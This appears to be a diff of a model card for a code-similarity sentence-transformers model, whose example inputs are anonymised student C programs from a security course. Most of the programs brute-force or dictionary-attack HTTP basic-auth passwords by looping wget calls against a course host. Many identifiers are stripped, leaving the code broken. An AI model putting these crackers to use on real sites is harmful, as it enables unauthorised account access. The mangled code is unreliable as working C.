\ \n\t \n\t \t \n\t exitValue=system(\"diff one.html index.html\
|
229 |
+
\ > .out\" );\n\t \n fr=fopen(\".out\",\"r\");\n\t \n\t \
|
230 |
+
\ strcpy(s,\"mailx -s \\\"Testing Again\\\"\");\n\t \t \n\t strcat(s,\"\
|
231 |
+
\ < .out\");\n\t if(fgets(url,30,fr))\n\t {\n\t system(s);\n\t \
|
232 |
+
\ \n\t system(\"rm one.html\"); \n\t \n\t printf(\"\\nCheck your\
|
233 |
+
\ mail\") ; \n\t fclose(fr); \n\t }\n\t else\n\t \
|
234 |
+
\ {\n\t printf(\" changes detected\"); \n\t\t \n\t \
|
235 |
+
\ system(\"rm one.html\"); \n\t\t fclose(fr); \n\t\t }\n\t\t return 0;\
|
236 |
+
\ \n }\n \n \n \n\n\n\n"
|
237 |
+
sentences:
|
238 |
+
- "\n\n\n#define _REENTRANT\n#include <sys/time.h>\n#include <sys/types.h>\n#include\
|
239 |
+
\ <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <stdarg.h>\n#include\
|
240 |
+
\ <unistd.h>\n#include <errno.h>\n#include <ctype.h>\n#include <pthread.h>\n#include\
|
241 |
+
\ <signal.h>\n\n\n#define MAX_THREADS 1000\n#define MAX_COMBO \n#define false\
|
242 |
+
\ 0\n#define true 1\n\n\nstatic char *alphabet=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
|
243 |
+
;\nstatic char **combination=NULL;\nstatic char host[128];\n\n\npthread_mutex_t\
|
244 |
+
\ counter_lock = PTHREAD_MUTEX_INITIALIZER;\npthread_mutex_t thread_lock = PTHREAD_MUTEX_INITIALIZER;\n\
|
245 |
+
pthread_cond_t start_hacking = PTHREAD_COND_INITIALIZER;\npthread_cond_t thread_ready\
|
246 |
+
\ = PTHREAD_COND_INITIALIZER;\n\n\nstatic int attempt_count=0;\nstatic int combo_entries=0;\n\
|
247 |
+
\nstatic struct timeval ;\nstatic struct timeval stop;\nstatic int thread_ready_indicator=false;\n\
|
248 |
+
static int thread_start_indicator=false;\nstatic int thread_count=0;\n\n\ntypedef\
|
249 |
+
\ struct range\n{\n int ;\n int ;\n}range;\n\n\nvoid *client(void *arg)\n{\n\
|
250 |
+
\ \n int i=0, status=1;\n range *= (struct range*)arg;\n\n \n char local_buffer[128];\n\
|
251 |
+
\n pthread_mutex_lock(&thread_lock);\n thread_ready_indicator=true;\n\n \n\
|
252 |
+
\ pthread_cond_signal(&thread_ready);\n\n \n while(thread_start_indicator==false)\
|
253 |
+
\ pthread_cond_wait(&start_hacking, &thread_lock);\n fflush(stdout);\n pthread_mutex_unlock(&thread_lock);\n\
|
254 |
+
\n \n for(i=->; i<=-> && i<combo_entries; i++)\n {\n \n sprintf(local_buffer,\n\
|
255 |
+
\ \"wget -q -C off -o //null -O //null --http-user=%s --http-passwd=%s %s\"\
|
256 |
+
,\n \"\", combination[i], host);\n\n \n status=system(local_buffer);\n\
|
257 |
+
\ \n\n \n if(status==0)\n {\n printf(\"\\n\\nusername: \\npassword:\
|
258 |
+
\ %s\\n\\n\", combination[i]);\n fflush(stdout);\n\n \n pthread_mutex_lock(&counter_lock);\n\
|
259 |
+
\n attempt_count++;\n gettimeofday(&stop, NULL);\n\n printf(\"\
|
260 |
+
About %d attempts were , which took %ld.%ld seconds complete.\\n\",\n \
|
261 |
+
\ attempt_count, stop.tv_sec-.tv_sec, labs(stop.tv_usec-.tv_usec));\n fflush(stdout);\n\
|
262 |
+
\n pthread_mutex_unlock(&counter_lock);\n\n \n exit(EXIT_SUCCESS);\n\
|
263 |
+
\ }\n else\n {\n \n pthread_mutex_lock(&counter_lock);\n \
|
264 |
+
\ attempt_count++;\n pthread_mutex_unlock(&counter_lock);\n }\n \
|
265 |
+
\ }\n pthread_exit(NULL);\n}\n\n\nchar *getNextCombination()\n{\n \n static\
|
266 |
+
\ int i=0;\n static int j=0;\n static int k=0;\n\n static int mode=1;\n char\
|
267 |
+
\ *word;\n\n\n \n\n if(i>51)\n {\n mode++; i=0; j=0; k=0;\n }\n\n \n \
|
268 |
+
\ if(mode==1)\n {\n char *word = calloc(mode, 1);\n word[0]=alphabet[i++];\n\
|
269 |
+
\ word[1]='\\0';\n return word;\n }\n\n \n if(mode==2)\n {\n if(j>51)\n\
|
270 |
+
\ {\n i++; j=0;\n }\n\n if(i>51)\n {\n mode++;\n i=0;\
|
271 |
+
\ j=0; j=0;\n }\n else\n {\n char *word = calloc(mode, 1);\n \
|
272 |
+
\ word[0]=alphabet[i];\n word[1]=alphabet[j++];\n word[2]='\\0';\n\
|
273 |
+
\ return word;\n }\n }\n\n \n if(mode==3)\n {\n if(k>51)\n {\n\
|
274 |
+
\ j++; k=0;\n }\n\n if(j>51)\n {\n i++; j=0;\n }\n\n \
|
275 |
+
\ if(i>51)\n {\n mode++;\n i=0; j=0; j=0;\n }\n else\n\
|
276 |
+
\ {\n char *word = calloc(mode, 1);\n word[0]=alphabet[i];\n \
|
277 |
+
\ word[1]=alphabet[j];\n word[2]=alphabet[k++];\n word[3]='\\\
|
278 |
+
0';\n return word;\n }\n }\n return NULL;\n}\n\n\nint main(int argc,\
|
279 |
+
\ char **argv)\n{\n \n int wait_status=0, i=0, j=0, num_threads=0;\n int partition=0,\
|
280 |
+
\ prev_min=0, prev_max=0;\n int len=0;\n char *word; range *;\n pthread_t tid[MAX_THREADS];\n\
|
281 |
+
\ int non_alpha_detected=0;\n\n \n if(argc<3)\n {\n puts(\"Incorrect usage!\"\
|
282 |
+
);\n puts(\"./brute num_threads url\");\n exit(EXIT_FAILURE);\n }\n\n \
|
283 |
+
\ \n strcpy(host, argv[2]);\n\n \n num_threads=atoi(argv[1]);\n\n \n combination\
|
284 |
+
\ = (char **)calloc(MAX_COMBO, sizeof(char *));\n\n printf(\"Process ID for the\
|
285 |
+
\ thread is: %d\\n\", getpid());\n printf(\"Creating brute-force dictionary\
|
286 |
+
\ ... \");\n \n \n while( (word=getNextCombination())!= NULL && i<MAX_COMBO)\n\
|
287 |
+
\ {\n combination[i]=calloc(strlen(word)+1, sizeof(char));\n strcpy(combination[i++],\
|
288 |
+
\ word);\n combo_entries++;\n }\n puts(\"\");\n j=0;\n\n \n partition=combo_entries/num_threads;\n\
|
289 |
+
\n \n if(partition==0)\n {\n puts(\"Reducing the number of threads match\
|
290 |
+
\ the number of words.\");\n num_threads=combo_entries;\n partition=1;\n\
|
291 |
+
\ }\n\n \n prev_min=0;\n prev_max=partition;\n i=0;\n\n memset(&, 0, sizeof(struct\
|
292 |
+
\ timeval));\n memset(&stop, 0, sizeof(struct timeval));\n\n \n while(i<num_threads\
|
293 |
+
\ && i<MAX_THREADS)\n {\n \n =malloc(sizeof(struct range));\n ->=prev_min;\n\
|
294 |
+
\ ->=prev_max;\n\n \n pthread_mutex_lock(&thread_lock);\n thread_ready_indicator=false;\n\
|
295 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n if(pthread_create(&tid[i++],\
|
296 |
+
\ NULL, client, (void *))!=0) puts(\"Bad thread ...\");\n\n \n pthread_mutex_lock(&thread_lock);\n\
|
297 |
+
\ while(thread_ready_indicator==false) pthread_cond_wait(&thread_ready, &thread_lock);\n\
|
298 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n prev_min+=partition+1;\n\
|
299 |
+
\n \n if(i==num_threads)\n {\n prev_max=combo_entries;\n }\n\
|
300 |
+
\ else\n {\n prev_max+=partition+1;\n }\n }\n\n \n gettimeofday(&,\
|
301 |
+
\ NULL);\n\n \n pthread_mutex_lock(&thread_lock);\n thread_start_indicator=true;\n\
|
302 |
+
\ pthread_mutex_unlock(&thread_lock);\n\n \n pthread_cond_broadcast(&start_hacking);\n\
|
303 |
+
\n \n printf(\"Created %d threads process %d passwords\\n\", num_threads, combo_entries);\n\
|
304 |
+
\ printf(\"Attacking host: %s\\n\", host);\n fflush(stdout);\n\n \n for(i=0;\
|
305 |
+
\ i<num_threads && i<MAX_THREADS; i++) pthread_join(tid[i], NULL);\n\n gettimeofday(&stop,\
|
306 |
+
\ NULL);\n\n \n puts(\"Could not determine the password for this site.\");\n\
|
307 |
+
\ printf(\"About %d attempts were , which took %ld.%ld seconds complete.\\n\"\
|
308 |
+
,\n attempt_count, stop.tv_sec-.tv_sec, labs(stop.tv_usec-.tv_usec));\n fflush(stdout);\n\
|
309 |
+
\n \n for(i=0; i<combo_entries; i++) (combination[i]);\n (*combination);\n\n\
|
310 |
+
\ return EXIT_SUCCESS;\n}\n\n"
|
311 |
+
- "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <strings.h>\n\
|
312 |
+
#include <ctype.h>\n\nint ()\n{\n FILE *fp; \n char *chk,[4];\n int i=1;\n\
|
313 |
+
\ while (i == 1) \n {\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
314 |
+
);\n\n system(\"mkdir first\"); \n system(\"mkdir second\"); \n\n \n system(\"\
|
315 |
+
mv www.cs.rmit.edu./images/*.* first/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
|
316 |
+
\ first/\");\n\n sleep(86400); \n\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
|
317 |
+
);\n\n \n system(\"mv www.cs.rmit.edu./images/*.* second/\");\n system(\"mv\
|
318 |
+
\ www.cs.rmit.edu./students/*.* second/\");\n\n \n \n system(\"diff first second\
|
319 |
+
\ > imagesdifference.txt\");\n\n \n fp = fopen(\"imagesdifference.txt\",\"r\"\
|
320 |
+
);\n \n chk = fgets(, 4, fp);\n \n if (strlen() != 0)\n system(\"mailx\
|
321 |
+
\ -s \\\"Difference from WatchDog\\\" < imagesdifference.txt\");\n }\n return\
|
322 |
+
\ 0;\n}\n"
|
323 |
+
- "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
|
324 |
+
\n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
|
325 |
+
\ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
|
326 |
+
\ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
|
327 |
+
);\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
|
328 |
+
\n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
|
329 |
+
\ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
|
330 |
+
\ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
|
331 |
+
\ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
|
332 |
+
\ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
|
333 |
+
\ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
|
334 |
+
n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
|
335 |
+
\ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
|
336 |
+
\t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
|
337 |
+
int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
|
338 |
+
\ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
|
339 |
+
Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
|
340 |
+
\ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
|
341 |
+
\ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
|
342 |
+
\ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
|
343 |
+
\ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
|
344 |
+
\ \n}\n \n\t \n\t \t\n"
|
345 |
+
- source_sentence: "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n\
|
346 |
+
#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char\
|
347 |
+
\ *passwd)\n {\n int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n\
|
348 |
+
\ \n \n strcpy(str1,\"wget --http-user= --http-passwd=\");\n strcpy(str2,\"\
|
349 |
+
\ http://sec-crack.cs.rmit.edu./SEC/2/\");\n strcpy(tempstr,\"\");\n\n\n\n \
|
350 |
+
\ for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n\
|
351 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"SENDING\
|
352 |
+
\ REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n if (success==0)\n\
|
353 |
+
\ return 1;\n else\n strcpy(tempstr,\"\"); \n strcpy(passwd,\"\
|
354 |
+
\");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n\
|
355 |
+
\ for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n\
|
356 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf(\"\
|
357 |
+
SENDING REQUEST AS %s\\n\",tempstr);\n success=system (tempstr);\n \
|
358 |
+
\ if (success==0)\n return 1;\n else\n strcpy(tempstr,\"\
|
359 |
+
\"); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n \
|
360 |
+
\ passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\
|
361 |
+
\ for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n\
|
362 |
+
\ strcat(tempstr,passwd);\n strcat(tempstr,str2);\n \
|
363 |
+
\ printf(\"SENDING REQUEST AS %s\\n\",tempstr);\n success=system\
|
364 |
+
\ (tempstr);\n if (success==0)\n return 1;\n \
|
365 |
+
\ else\n strcpy(tempstr,\"\"); \n\t } \n } \n \
|
366 |
+
\ }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n\
|
367 |
+
\ int i,success;\n char ch='a';\n\n\n \n int , end; \n \
|
368 |
+
\ = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]='\\0';\n\
|
369 |
+
\ } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\
|
370 |
+
\t ch++;\n }\n ch='A'; \n for (i=26;i<52;i++)\n {\n \
|
371 |
+
\ chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n\
|
372 |
+
\ printf(\"\\nPassword is %s\\n\",passwd); \n getpid();\n end =\
|
373 |
+
\ time(); \n printf(\"Time required = %lld msec\\n\",(end-)/());\n return\
|
374 |
+
\ (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n"
|
375 |
+
sentences:
|
376 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n\
|
377 |
+
#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n\
|
378 |
+
\ char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={'a','A','b','B','c','C','d','D','e','E','f','F','g','G','h','H','i','I','j','J','k','K','l','L','m','M','n','N','o','O','p','P','q','Q','r','R','s','S','t','T','u','U','v','V','w','W','x','X','y','Y','z','Z'};\n\
|
379 |
+
time_t u1,u2;\n\n (void) time(&u1); \n strcpy(temp1,\"wget --http-user= --http-passwd=\"\
|
380 |
+
);\n strcpy(temp2,\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n \n for(m=0;m<=51;m++)\n\
|
381 |
+
\ {\n v[0]=[m]; \n v[1]='\\0';\n v[2]='\\0';\n strcpy(URL,v); \n printf(\"\
|
382 |
+
\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n\
|
383 |
+
\ strcat(temp3,temp2);\n printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\
|
384 |
+
\ \n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password\
|
385 |
+
\ is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var taken crack the password is\
|
386 |
+
\ %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\
|
387 |
+
\tstrcpy(temp3,\"\");\n\t}\n for(n=0;n<=51;n++)\n {\n v[0]=[m]; \n v[1]=[n];\n\
|
388 |
+
\ v[2]='\\0';\n strcpy(URL,v); \n printf(\"\\nTesting with password %s\\\
|
389 |
+
n\",URL);\n strcat(temp3,temp1);\n strcat(temp3,URL);\n strcat(temp3,temp2);\n\
|
390 |
+
\ printf(\"\\nSending the %s\\n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n\
|
391 |
+
\ \t{\n\t (void) time(&u2); \n\t printf(\"\\n The password is %s\\n\",URL);\n\
|
392 |
+
\t printf(\"\\n\\nThe time_var taken crack the password is %d second\\n\\n\"\
|
393 |
+
,(int)(u2-u1));\n \t exit(0);\n \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\
|
394 |
+
\t}\n for(o=0;o<=51;o++)\n { \n v[0]=[m]; \n v[1]=[n];\n v[2]=[o];\n\
|
395 |
+
\ strcpy(URL,v); \n printf(\"\\nTesting with password %s\\n\",URL);\n strcat(temp3,temp1);\n\
|
396 |
+
\ strcat(temp3,URL);\n strcat(temp3,temp2);\n printf(\"\\nSending the %s\\\
|
397 |
+
n\",temp3);\n i=system(temp3);\n \t\n\tif(i==0)\n \t{\n\t (void) time(&u2);\
|
398 |
+
\ \n\t printf(\"\\n The password is %s\\n\",URL);\n\t printf(\"\\n\\nThe time_var\
|
399 |
+
\ taken crack the password is %d second\\n\\n\",(int)(u2-u1));\n \t exit(0);\n\
|
400 |
+
\ \t} \n\telse\n\t{\n\tstrcpy(temp3,\"\");\n\t}\n \n \n }\n }\n } \n\
|
401 |
+
\ \n} \n"
|
402 |
+
- "\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
|
403 |
+
#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\n\
|
404 |
+
char b[53]=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n\nint i,j,k,count=0;\n\
|
405 |
+
int total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n\
|
406 |
+
{\n\t\n\tm[0]=b[i];\n\tm[1]='\\0';\n\tstrcpy(c,m);\n\tprintf(\"%s \\n\",c);\n\t\
|
407 |
+
for(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]='\\0';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\
|
408 |
+
\tprintf(\"%s \\n\",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf(\"\
|
409 |
+
ATTEMPT :%d\\n\",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]='\\0';\n\t\tstrcpy(c2,c1);\n\
|
410 |
+
\t\tstrcat(c2,m);\n\nstrcpy(a,\"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php\
|
411 |
+
\ --http-user= --http-passwd=\");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\
|
412 |
+
\t\t{\n\t\tprintf(\"Congratulations!!!!BruteForce Attack Successful\\n\");\n\t\
|
413 |
+
\tprintf(\"***********************************************\\n\");\n\t\tprintf(\"\
|
414 |
+
The Password is %s\\n\",c2);\n\t\tprintf(\"The Request sent is %s\\n\",a); \n\
|
415 |
+
\ end_time = time();\n total_time = (end_time -start_time);\n\
|
416 |
+
\ total_time /= 1000000000.0;\n printf(\"The Time\
|
417 |
+
\ Taken is : %llds\\n\",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\
|
418 |
+
\t\n\t}\n\n}\n}\nreturn 0;\n}\n"
|
419 |
+
- "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<strings.h>\n\
|
420 |
+
#include <ctype.h>\n#include <math.h>\n#include <sys/time.h>\n\nint\n()\n{\n\n\
|
421 |
+
\tint , end;\n\tFILE *fp;\n\tint i, j;\n\tchar \
|
422 |
+
\ input;\n\tchar password[30];\n\tint check;\n\
|
423 |
+
\n\tfloat total_time;\n\tint number;\n\t = time();\n\n\n\
|
424 |
+
\tif ((fp = fopen(\"words\", \"r\")) == NULL) {\n\t\tfprintf(stderr, \"Error :\
|
425 |
+
\ Failed open words for .\\n\");\n\t\treturn (EXIT_FAILURE);\n\t}\n\twhile ((input\
|
426 |
+
\ = fgetc(fp)) != EOF) {\n\t\tj = 0;\n\t\tfor (i = 0; i < 30; i++)\n\t\t\tpassword[i]\
|
427 |
+
\ = '\\0';\n\n\t\twhile(input != '\\n' ) {\n\n\t\t\tpassword[j] = input;\n\t\t\
|
428 |
+
\tj++;\n\t\t\tinput = fgetc(fp);\n\t\t\t\n\t\t\n\t\t}\n\n\n\t\tif (strlen(password)\
|
429 |
+
\ <= 3) {\n\t\t\tprintf(\"%s\\t\",password);\n\t\t\tfflush(stdout);\n\t\t\tcheck\
|
430 |
+
\ = SysCall(password);\n\t\t\tif (check == 0) {\n\t\t\t\tgetpid();\n\t\t\t\tend\
|
431 |
+
\ = time();\n\t\t\t\ttotal_time = (end - ) / 1e9;\n\t\t\t\tprintf(\"\\ntotal time_var\
|
432 |
+
\ = %f \", total_time);\n\t\t\t\tprintf(\"\\n\\nAvg getpid() time_var = %f usec\\\
|
433 |
+
n\", total_time);\n\t\t\t\tprintf(\"\\navg time_var %f / %d = %f\\n\", total_time,\
|
434 |
+
\ number, total_time / number);\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\n\t}\n\n\t\
|
435 |
+
return (EXIT_SUCCESS);\n}\nint\nSysCall(char *password)\n{\n\tchar \
|
436 |
+
\ url1[255], url2[255], [255];\n\tint rettype;\n\trettype = 0;\n\t\
|
437 |
+
strcpy(url1, \"wget --non-verbose --http-user= --http-passwd=\");\n\tstrcpy(url2,\
|
438 |
+
\ \" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n\tstrcat(, url1);\n\t\
|
439 |
+
strcat(, password);\n\tstrcat(, url2);\n\n\trettype = system();\n\t\n\tif (rettype\
|
440 |
+
\ == 0) {\n\t\tprintf(\"Successfully retrieved password: %s\\n\", password);\n\
|
441 |
+
\t\treturn 0;\n\t}\n\tstrcpy(, \"\");\n}\n"
|
442 |
+
pipeline_tag: sentence-similarity
|
443 |
+
library_name: sentence-transformers
|
444 |
+
---
|
445 |
+
|
446 |
+
# SentenceTransformer based on microsoft/unixcoder-base-unimodal
|
447 |
+
|
448 |
+
This is a [sentence-transformers](https://www.SBERT.net) model fine-tuned from [microsoft/unixcoder-base-unimodal](https://huggingface.co/microsoft/unixcoder-base-unimodal). It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
|
449 |
+
|
450 |
+
## Model Details
|
451 |
+
|
452 |
+
### Model Description
|
453 |
+
- **Model Type:** Sentence Transformer
|
454 |
+
- **Base model:** [microsoft/unixcoder-base-unimodal](https://huggingface.co/microsoft/unixcoder-base-unimodal) <!-- at revision c6b7b85380bf4e01309a3cf5e4f686433764d923 -->
|
455 |
+
- **Maximum Sequence Length:** 512 tokens
|
456 |
+
- **Output Dimensionality:** 768 dimensions
|
457 |
+
- **Similarity Function:** Cosine Similarity
|
458 |
+
<!-- - **Training Dataset:** Unknown -->
|
459 |
+
<!-- - **Language:** Unknown -->
|
460 |
+
<!-- - **License:** Unknown -->
|
461 |
+
|
462 |
+
### Model Sources
|
463 |
+
|
464 |
+
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
|
465 |
+
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
|
466 |
+
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
|
467 |
+
|
468 |
+
### Full Model Architecture
|
469 |
+
|
470 |
+
```
|
471 |
+
SentenceTransformer(
|
472 |
+
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
|
473 |
+
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
|
474 |
+
)
|
475 |
+
```
|
476 |
+
|
477 |
+
## Usage
|
478 |
+
|
479 |
+
### Direct Usage (Sentence Transformers)
|
480 |
+
|
481 |
+
First install the Sentence Transformers library:
|
482 |
+
|
483 |
+
```bash
|
484 |
+
pip install -U sentence-transformers
|
485 |
+
```
|
486 |
+
|
487 |
+
Then you can load this model and run inference.
|
488 |
+
```python
|
489 |
+
from sentence_transformers import SentenceTransformer
|
490 |
+
|
491 |
+
# Download from the 🤗 Hub
|
492 |
+
model = SentenceTransformer("buelfhood/SOCO-C-UniXcoder-ST-0")
|
493 |
+
# Run inference
|
494 |
+
sentences = [
|
495 |
+
'\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n int i,j,k,success;\n char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n \n \n strcpy(str1,"wget --http-user= --http-passwd=");\n strcpy(str2," http://sec-crack.cs.rmit.edu./SEC/2/");\n strcpy(tempstr,"");\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n strcpy(passwd,"");\n } \n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n \n } \n }\n\n\n\n for(i=0;i<52;i++)\n {\n passwd[0]= chararray[i];\n for(j=0;j<52;j++)\n {\n passwd[1]=chararray[j];\n for(k=0;k<52;k++)\n\t {\n\t passwd[2]=chararray[k];\n\t strcat(tempstr,str1);\n strcat(tempstr,passwd);\n strcat(tempstr,str2);\n printf("SENDING REQUEST AS %s\\n",tempstr);\n success=system (tempstr);\n if (success==0)\n return 1;\n else\n strcpy(tempstr,""); \n\t } \n } \n }\n return 1;\n } \n\nint (int argc, char *argv[])\n {\n char chararray[52],passwd[3];\n int i,success;\n char ch=\'a\';\n\n\n \n int , end; \n = time();\t \n\n for (i=0;i<3;i++)\n {\n passwd[i]=\'\\0\';\n } \n\n\n\n for (i=0;i<26;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n ch=\'A\'; \n for (i=26;i<52;i++)\n {\n chararray[i]= ch;\n\t ch++;\n }\n\n\n\n success=genchkpwd(chararray,passwd);\n printf("\\nPassword is %s\\n",passwd); \n getpid();\n end = time(); \n printf("Time required = %lld msec\\n",(end-)/());\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
|
496 |
+
'\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\nchar b[53]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\nint i,j,k,count=0;\nint total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n{\n\t\n\tm[0]=b[i];\n\tm[1]=\'\\0\';\n\tstrcpy(c,m);\n\tprintf("%s \\n",c);\n\tfor(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]=\'\\0\';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\tprintf("%s \\n",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf("ATTEMPT :%d\\n",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]=\'\\0\';\n\t\tstrcpy(c2,c1);\n\t\tstrcat(c2,m);\n\nstrcpy(a,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\t\t{\n\t\tprintf("Congratulations!!!!BruteForce Attack Successful\\n");\n\t\tprintf("***********************************************\\n");\n\t\tprintf("The Password is %s\\n",c2);\n\t\tprintf("The Request sent is %s\\n",a); \n end_time = time();\n total_time = (end_time -start_time);\n total_time /= 1000000000.0;\n printf("The Time Taken is : %llds\\n",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\t\n\t}\n\n}\n}\nreturn 0;\n}\n',
|
497 |
+
